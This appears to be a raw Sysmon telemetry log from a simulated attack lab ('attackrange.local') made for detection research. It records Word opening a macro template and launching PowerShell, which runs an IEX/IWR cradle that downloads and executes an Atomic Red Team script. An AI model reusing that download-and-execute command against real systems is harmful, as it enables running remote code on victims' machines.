Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001530425Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValid 734700x80000000000000001530424Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001530423Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001530422Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x80000000000000001530421Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001530420Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001530419Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001530418Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001530417Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001530416Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001530415Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001530414Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001530413Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\ConhostV2.dll10.0.14393.1198 (rs1_release_sec.170427-1353)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXEMD5=C16CC61A395D046B4294C92F7C1FD0C2,SHA256=6B5240C0D6F5C1E87A7713CAB668FA9DB0E54492441979ACBD7EA9323724C1B8trueMicrosoft WindowsValid 734700x80000000000000001530412Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 10341000x80000000000000001530411Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-84C5-607D-E100-00000000BB01}32203160C:\Windows\system32\csrss.exe{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 734700x80000000000000001530410Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001530409Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001530408Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001530407Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXEMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0trueMicrosoft WindowsValid 154100x80000000000000001530406Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.595{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsWIN-HOST-5\Administrator{21761711-84C7-607D-C8E0-090000000000}0x9e0c82HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/dragonstail_benign.ps1') 734700x80000000000000001530405Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001530404Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001530403Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001530402Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436trueMicrosoft WindowsValid 10341000x80000000000000001530401Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-84C5-607D-E100-00000000BB01}32203160C:\Windows\system32\csrss.exe{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001530400Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-4F27-6080-8D5B-00000000BB01}56247944C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+43ae7|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+4358a|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+44642|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3c560|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3d357|C:\Windows\System32\windows.storage.dll+16e69f|C:\Windows\System32\windows.storage.dll+16e315|C:\Windows\System32\windows.storage.dll+16de06|C:\Windows\System32\windows.storage.dll+16f278|C:\Windows\System32\windows.storage.dll+16dc2e|C:\Windows\System32\windows.storage.dll+fd025|C:\Windows\System32\windows.storage.dll+fd3a4|C:\Windows\System32\windows.storage.dll+fc9e0|C:\Windows\System32\SHELL32.dll+3cd0f|C:\Windows\System32\SHELL32.dll+3cb9c|C:\Windows\System32\SHELL32.dll+dcb5e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001530399Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.592{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/dragonstail_benign.ps1')C:\Users\Administrator\AppData\Roaming\Microsoft\Templates\WIN-HOST-5\Administrator{21761711-84C7-607D-C8E0-090000000000}0x9e0c82HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "C:\Users\Administrator\Desktop\cs_doc1_rundll32.dotm 12241200x80000000000000001530398Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.585{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders 12241200x80000000000000001530397Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.585{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders 12241200x80000000000000001530396Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.585{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace 12241200x80000000000000001530395Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.585{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace 11241100x80000000000000001530394Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\amsi_tracer\-176455006_WINWORD.EXE_5624_1300_840.dmp2021-04-21 17:30:15.585 13241300x80000000000000001530393Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.570{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530392Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.570{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15Binary Data 10341000x80000000000000001530391Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.570{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530390Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.164{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530389Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.164{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=880B4479144C9B7114A80C379B9BBCC7,SHA256=CF55BB7187EE5F5371E3BA9ECC6602574846C69A3FF784705CAA8DF9D0C35AB4falsefalse - insufficient disk space 11241100x80000000000000001530883Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.719{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-04-19 13:20:06.758 23542300x80000000000000001530882Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.719{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DBE6F8B8D52786D84986AD713BEF83D8,SHA256=5B2F5B50D29668326FDF661A35BA258C0CF5B0266A80E1B7B97C753382AB9D20falsefalse - insufficient disk space 11241100x80000000000000001530881Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.670{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001530880Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.670{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48AB15B0AAB8381640AD0F209ABFCA4D,SHA256=970D2E10D547613ED65E44F1E3139E9B2101A7F2C19628FE9306A5A294E7C142falsefalse - insufficient disk space 12241200x80000000000000001530879Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:16.603{21761711-EE8A-607D-CF12-00000000BB01}7212C:\Windows\SysWOW64\dllhost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x80000000000000001530878Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:16.603{21761711-EE8A-607D-CF12-00000000BB01}7212C:\Windows\SysWOW64\dllhost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 11241100x80000000000000001530877Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.171{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530876Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.171{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA22001AD2801758C3E084CB53A53424,SHA256=42F16B167222059386600BEE16E80D1D0E3DDBEED6048E4DD0B12C184F382690falsefalse - insufficient disk space 10341000x80000000000000001061104Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:16.047{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061103Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:16.047{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061102Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:16.044{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=434C876E5771D83725262521A796C26C,SHA256=5C40236CA47DB09A19BC811CD55D1A522F778CB76FF2BFA29BF2C59E2BF2F0A5,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001530875Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:16.018{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000B0498\VirtualDesktopBinary Data 12241200x80000000000000001530874Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:16.018{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000B0498 11241100x80000000000000001530873Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.002{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530872Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.002{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3DA9202B184268583E8C7D1E3572475,SHA256=9982F514FAB6D244C88E928750F9992BF6CCE2C5EC7CFA8408AC2F35467BFC6Bfalsefalse - insufficient disk space 22542200x80000000000000001530894Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 